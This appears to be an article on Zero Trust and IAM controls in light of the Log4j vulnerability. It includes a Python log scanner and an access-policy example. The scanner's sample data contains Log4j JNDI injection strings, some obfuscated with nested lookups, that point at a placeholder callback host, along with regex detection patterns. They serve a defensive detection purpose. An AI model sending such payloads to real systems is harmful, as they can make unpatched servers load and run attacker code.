Zero Trust and Identity and Access Management (IAM) in the context of the Log4j vulnerability
The Log4j zero-day vulnerability (NIST reference: https://nvd.nist.gov/vuln/detail/CVE-2021-44228) shook us back in late 2021. No one would have thought that such a commonly used utility library could be abused to perform remote code execution. The attacker only needs to get an attacker-controlled string, such as a JNDI lookup of the form ${jndi:ldap://attacker-host/x}, into something the application logs; a vulnerable Log4j version resolves the lookup, contacts the attacker's LDAP or RMI server, and can load and run attacker-supplied code with the privileges of the application doing the logging. An important point to note is that logging is typically a "trusted insider" hosted within the company's network perimeter, yet it was leveraged to launch the attack. This calls for action, bringing out the importance of Identity and Access Management (IAM), and in particular Zero Trust, in protecting the organization. That is not to say that having IAM tooling or Zero Trust in place protects you against attacks arising from the Log4j vulnerability; patching the library remains the actual fix, and the controls below limit what an attacker can do after a successful exploit. Here is the link to my article on Zero Trust for reference: https://www.linkedin.com/pulse/what-zero-trust-madhukeshwar-bhat-pmp-cism
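As an added example (not part of the original article, and not code from the Log4j project), here is a small Python scanner that shows what the attack string looks like and how Log4j's lookup syntax can be nested to hide the jndi keyword from naive pattern matching. It also illustrates the continuous monitoring point further down, since it is the kind of check an alerting pipeline would run over web-server logs. The log lines, the callback address 203.0.113.10 and the header names are constructed for this example.

```python
import re
from typing import List, Tuple

# Constructed sample log lines (not real traffic). Line 0 is benign; lines 1-3 carry
# a JNDI lookup in a client-supplied header, the last two in obfuscated form.
SAMPLE_LOGS = [
    '10.0.0.5 - - "GET / HTTP/1.1" 200 UA="Mozilla/5.0"',
    '10.0.0.9 - - "GET /login HTTP/1.1" 200 UA="${jndi:ldap://203.0.113.10:1389/a}"',
    '10.0.0.9 - - "GET /login HTTP/1.1" 200 UA="${${lower:j}ndi:${lower:r}mi://203.0.113.10/x}"',
    '10.0.0.9 - - "GET /api HTTP/1.1" 200 X-Api-Version="${${::-j}${::-n}${::-d}${::-i}:dns://203.0.113.10/z}"',
]

# Each pattern matches only an innermost lookup (no braces inside), so repeated
# substitution resolves nesting from the inside out.
LOOKUP_DEFAULT = re.compile(r"\$\{[^{}]*?:-([^{}]*)\}")                  # ${x:y:-v} -> v
LOOKUP_CASE = re.compile(r"\$\{(lower|upper):([^{}]*)\}", re.IGNORECASE)  # ${lower:J} -> j
JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
JNDI_TARGET = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)://([^/:}\s]+)", re.IGNORECASE)


def _fold_case(m) -> str:
    return m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper()


def normalize_lookups(text: str, max_rounds: int = 20) -> str:
    """Collapse the lookup forms used to hide the jndi keyword, innermost first."""
    for _ in range(max_rounds):
        folded = LOOKUP_DEFAULT.sub(lambda m: m.group(1), text)
        folded = LOOKUP_CASE.sub(_fold_case, folded)
        if folded == text:
            break
        text = folded
    return text


def extract_jndi_targets(normalized: str) -> List[Tuple[str, str]]:
    """Return (scheme, host) pairs the lookup would contact; usable as block-list IOCs."""
    return [(scheme.lower(), host) for scheme, host in JNDI_TARGET.findall(normalized)]


def scan_logs(lines: List[str]) -> List[Tuple[int, str, List[Tuple[str, str]]]]:
    """Flag lines that contain a JNDI lookup once the obfuscation is undone."""
    hits = []
    for idx, line in enumerate(lines):
        normalized = normalize_lookups(line)
        if JNDI.search(normalized):
            hits.append((idx, normalized, extract_jndi_targets(normalized)))
    return hits


if __name__ == "__main__":
    for idx, normalized, targets in scan_logs(SAMPLE_LOGS):
        print(f"ALERT line {idx}: callback targets {targets}\n  {normalized}")
```

Normalization only undoes the lookup forms shown here (the ":-" default syntax and the lower/upper lookups), so treat a hit as a reason to alert and to block the callback host at the egress firewall, not as proof that the host was exploited, and remember that upgrading Log4j is the actual fix.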
Least privilege principle: a user, application or device should be granted the least privilege sufficient for carrying out its assigned tasks. This needs to be managed actively across the organization, not granted once and forgotten.
Contextual access: access to resources needs to be determined by the context. Depending on multiple factors, the system decides whether to grant or deny access to the resource. For example, the user's location, the type of device used (and whether it is managed) and the time the request was made could all be factors that determine the context.
Continuous monitoring: set up monitoring tools intelligent enough to trigger alerts, with the ability to feed into analytics engines so that the alerting mechanisms improve over time.
Limit exposure: resource exposure needs to be limited. For example, if a URL does not need to be reached from outside the company, there is no need to expose it to the general public. In general, the design should keep the attack surface as small as possible.
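The four principles above, together with the closing point that an internal origin does not exempt a request from authentication and authorization, can be captured in a single policy decision function. The following Python is an added example, not code from this article or from any IAM product; the roles, the "log-server" resource, the network labels and the 08:00 to 18:00 window are assumptions made for illustration.

```python
from dataclasses import dataclass, replace
from typing import Dict, FrozenSet, Set, Tuple


@dataclass(frozen=True)
class Resource:
    name: str
    internal_only: bool          # limit exposure: never reachable from the internet
    business_hours_only: bool    # contextual: only during the 08:00-18:00 window


@dataclass(frozen=True)
class Request:
    subject: str
    roles: FrozenSet[str]
    action: str
    source_network: str          # "corp", "vpn" or "internet"
    device_managed: bool         # posture signal from the endpoint agent
    mfa_verified: bool           # strong authentication already completed?
    hour: int                    # local hour of the request, 0-23


# Least privilege: this role-to-action table is the only source of permissions.
# Hypothetical roles and resource name for this example.
PERMISSIONS: Dict[Tuple[str, str], Set[str]] = {
    ("log-viewer", "log-server"): {"read"},
    ("log-admin", "log-server"): {"read", "configure"},
}

LOG_SERVER = Resource(name="log-server", internal_only=True, business_hours_only=True)

# A baseline request that passes every check; scenarios vary one attribute at a time.
BASE_REQUEST = Request(
    subject="alice", roles=frozenset({"log-admin"}), action="configure",
    source_network="corp", device_managed=True, mfa_verified=True, hour=10,
)


def request_with(**overrides) -> Request:
    return replace(BASE_REQUEST, **overrides)


def decide(req: Request, res: Resource, perms: Dict[Tuple[str, str], Set[str]]) -> Tuple[bool, str]:
    """Policy decision point: every request is evaluated; an internal origin buys nothing."""
    # 1. Strong authentication first, regardless of the source network.
    if not req.mfa_verified:
        return False, "mfa_required"
    # 2. Limit exposure: internal-only resources are never served to the internet.
    if res.internal_only and req.source_network == "internet":
        return False, "not_exposed_externally"
    # 3. Least privilege: the action must be granted by one of the subject's roles.
    granted = {a for role in req.roles for a in perms.get((role, res.name), ())}
    if req.action not in granted:
        return False, "action_not_granted"
    # 4. Context: unmanaged devices are limited to read-only actions.
    if not req.device_managed and req.action != "read":
        return False, "unmanaged_device_read_only"
    # 5. Context: time window for sensitive resources.
    if res.business_hours_only and not 8 <= req.hour < 18:
        return False, "outside_business_hours"
    return True, "allow"


if __name__ == "__main__":
    scenarios = {
        "baseline": request_with(),
        "from internet": request_with(source_network="internet"),
        "viewer tries configure": request_with(roles=frozenset({"log-viewer"})),
        "unmanaged device": request_with(device_managed=False),
        "no MFA from corp LAN": request_with(mfa_verified=False),
        "2am": request_with(hour=2),
    }
    for label, req in scenarios.items():
        print(f"{label:24s} -> {decide(req, LOG_SERVER, PERMISSIONS)}")
```

The order of the checks matters: authentication and exposure are settled before any role is consulted, so a request from the corporate LAN without MFA is rejected just as an internet request is, and each denial carries a reason string that can be fed to the monitoring pipeline.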
The key lesson learnt is that, irrespective of where an access request originates, it needs to undergo strong authentication and authorization. Just because an application is internal, don't bypass the critical security controls. Every security incident makes us more vigilant. Irrespective of whether you were impacted by this attack or not, it is better to have the right security controls in place. Prevention is better than cure!